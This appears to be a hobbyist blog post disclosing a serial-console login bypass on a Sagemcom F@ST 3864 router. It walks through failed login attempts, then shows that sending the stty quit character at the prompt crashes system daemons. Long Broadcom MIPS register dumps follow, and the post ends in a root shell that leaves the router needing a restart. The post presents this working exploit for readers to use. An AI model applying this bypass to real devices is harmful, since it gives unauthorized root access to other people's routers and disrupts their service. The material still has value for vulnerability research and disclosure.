f@st 3864: serial prompt authentication exploit.
F@ST 3864v1: serial prompt authentication exploit.
F@ST 3864v1:
serial prompt authentication exploit.
ok guys this ones a really quick one, ive got alot to come but this is urgent :P
during my usual diggings i was left sitting at the caret waiting on a login to begin..
Login: /////////////////////////////////////////////////////////////////////////
Password:
Login incorrect. Try again.
next i thought just a web null what could be the worst that happens:
Login:
Password:
Login incorrect. Try again.
next was:
Login: %^]���^B����=y4���^B���^\
just as a random ammount of unicode chars
and then i learnt
that i could simply use
Login: ^\ (this ones the stty quit command)
wlmngr/669: potentially unexpected fatal sign .
smd/340: potentially unexpected fatal signal 3.
Cpu 0
$ 0 : 00000000 10008d00 00000202 00000012
$ 4 : 00000012 7fee1710 00000000 00000001
$ 8 : 00000000 7fee15ec 00000000 77fe9434
$12 : 00009326 7fee15e4 00000000 00000000
$16 : 7fee1964 00000001 00401e2c 00000000
$20 : 00000000 00000000 00000000 00407b48
$24 : 00000000 2adaef90
$28 : 2adfc3e0 7fee1668 7fee1698 00404884
Hi : 00c34ea5
Lo : 1f6336bc
epc : 2adaefcc 0x2adaefcc
Tainted: P
ra : 00404884 0x404884
Status: 00008d13 USER EXL IE
Cause : 00000020
PrId : 0002a080 (Broadcom4350)
�consoled/976: potentially unexpected fatal signal 3.
swmdk/776: potentially unexpected fatal signal 3.
swmdk/727: potentially unexpected fatal signal 3.
dsldiagd/726: potentially unexpected fatal signal 3.
dhcpd/357: potentially unexpected fatal signal 3.
�
Cpu 0
$ 0 : 00000000
Cpu 1
$ 0 : 00000000 00000001 00000200 00000000
$ 4 : 00000003 0041951c 0000001c 00000001
$ 8 : 02000000 626c6564 4f4d5f43 4f4d5f47
$12 : 75657374 49736f6c 61746543 6c69656e
$16 : 0041951c 00000003 00400e34 00000000
$20 : 00000000 00000000 00000000 00407b48
$24 : 00000001 2af12980
$28 : 2af603e0 7ff7e328 7ff7e380 2af0e940
Hi : 00000001
Lo : 00000000
epc : 2af129a4 0x2af129a4
Tainted: P
ra : 2af0e940 0x2af0e940
Status: 00008d13 USER EXL IE
Cause : 00000020
PrId : 0002a080 (Broadcom4350)
00000001 00000202 0041ed80
$ 4 : 00000005 7fa5167c 00000000 00000001
$ 8 : 00000030 00000000 00000001 00000057
$12 : 00000807 00000800 00000400 00000008
$16 : 0041ec68
Cpu 1
$ 0 : 00000000 7fd4d1c6 00000202 00000001
$ 4 : 00000001 7fd4d18c 00000000 00000001
$ 8 : 03994c69 00000001 0000005b 00000000
$12 : 00000001 2ac456f3 2ab4bafb 2ac4171c
$16 : 7fd4d5d4 00000003 00400fc4 00000000
$20 : 00000000 00000000 00000000 00407b48
$24 : 2ac3b96c 2aea4f90
$28 : 2aef23e0 7fd4d0f8 7fd4d128 2ab5069c
Hi : 0000031b
Lo : 0000e4c2
epc : 2aea4fcc 0x2aea4fcc
Tainted: P
ra : 2ab5069c 0x2ab5069c
Status: 00008d13 USER EXL IE
Cause : 00000020
PrId : 0002a080 (Broadcom4350)
0000a8dd
Cpu 1
$ 0 : 00000000 7ffcf074 00000202 7ffcfdbc
$ 4 : 00000006 7ffcfdbc 00000000 00000001
$ 8 : 00000000 00000000 00000000 00000000
$12 : 00000000 00000000 00000000 00000000
$16 : 7ffd0024 00000001 00401000 00000000
$20 : 00000000 00000000 00000000 00407b48
$24 : 00000000 2abb7f90
$28 : 2ac053e0 7ffcfc98 7ffcfcc8 004012d8
Hi : 00000000
Lo : 00000000
epc : 2abb7fcc 0x2abb7fcc
Tainted: P
ra : 004012d8 0x4012d8
Status: 00008d13 USER EXL IE
Cause : 00000020
PrId : 0002a080 (Broadcom4350)
0041ec68
Cpu 1
$ 0 : 00000000 10008d00 00000202 80000000
$ 4 : 7fab3ac0 00000010 7fab3ac0 00000001
$ 8 : 00000000 00000000 00000000 00000415
$12 : 00000415 87b87c00 00000002 2af8a288
$16 : 7fab3ac0 2aafd454 2aafd480 00000000
$20 : 2aae17d0 00000000 00000000 00407b48
$24 : 2af86868 2af97760
$28 : 2afe43e0 7fab3a88 7fab3c28 2aae7238
Hi : 00000018
Lo : 00038c23
epc : 2af97788 0x2af97788
Tainted: P
ra : 2aae7238 0x2aae7238
Status: 00008d13 USER EXL IE
Cause : 00000020
PrId : 0002a080 (Broadcom4350)
Cpu 1
$ 0 : 00000000 10008d00 00000000 00000000
$ 4 : 7f3ffaf8 7f3ffaf8 00000000 00000000
$ 8 : 00000000 00008d00 00000000 87848000
$12 : 000092bc 811018e0 00000000 00000000
$16 : 7f3ffaf8 7f3ffaf8 00000002 00000000
$20 : 7f3ffb80 2aafd480 7f201000 00000004
$24 : 00000000 2af966c0
$28 : 2afe43e0 7f3ffa90 7f3ffca8 2aae6b50
Hi : 00000000
Lo : 3b9aca00
epc : 2af966e4 0x2af966e4
Tainted: P
ra : 2aae6b50 0x2aae6b50
Status: 00008d13 USER EXL IE
Cause : 00000020
PrId : 0002a080 (Broadcom4350)
00000001
$20 : 7fa51d14 0040bf84 0040bff0 0040bfa4
$24 : 00000001 2ab57f90
$28 : 2aba53e0 7fa515e8 7fa51618 00402488
Hi : 00000000
Lo : 0002b4e0
epc : 2ab57fcc 0x2ab57fcc
swmdk/777: potentially unexpected fatal signal 3.
Cpu 1
$ 0 : 00000000 00000001 00000204 00000000
$ 4 : 7f1ffaf8 7f1ffaf8 00000000 00000001
$ 8 : 00000000 80000008 80095310 fffffff0
$12 : 7f1ffb00 00000000 7f3ffab8 00000000
$16 : 7f1ffaf8 7f1ffaf8 00000003 00000000
$20 : 7f1ffb80 2aafd480 7f001000 00000004
$24 : 00000000 2af966c0
$28 : 2afe43e0 7f1ffa90 7f1ffca8 2aae6b50
Hi : 08e5afb8
Lo : 22b60d87
epc : 2af966e4 0x2af966e4
Tainted: P
ra : 2aae6b50 0x2aae6b50
Status: 00008d13 USER EXL IE
Cause : 00000020
PrId : 0002a080 (Broadcom4350)
Tainted: P
ra : 00402488 0x402488
Status: 00008d13 USER EXL IE
Cause : 00000020
PrId : 0002a080 (Broadcom4350)
ssk:error:704.805:ssk_main:435:detected exit of smd, ssk will also exit
Quit
dnsproxy:error:704.807:processCmsMsg:1258:lost connection to smd, exiting now.
tr69c:error:704.808:readMessageFromSmd:1555:lost connection to smd, exiting now.
And we have shell
#
although we have broken the router and it will now require a restart
enjoy and ill be back really soon with a few more surprises
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
STTY commands:
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;
eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; flush = ^O; min = 1; time = 0;
-brkint ixoff -imaxbel
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Comments
Post a Comment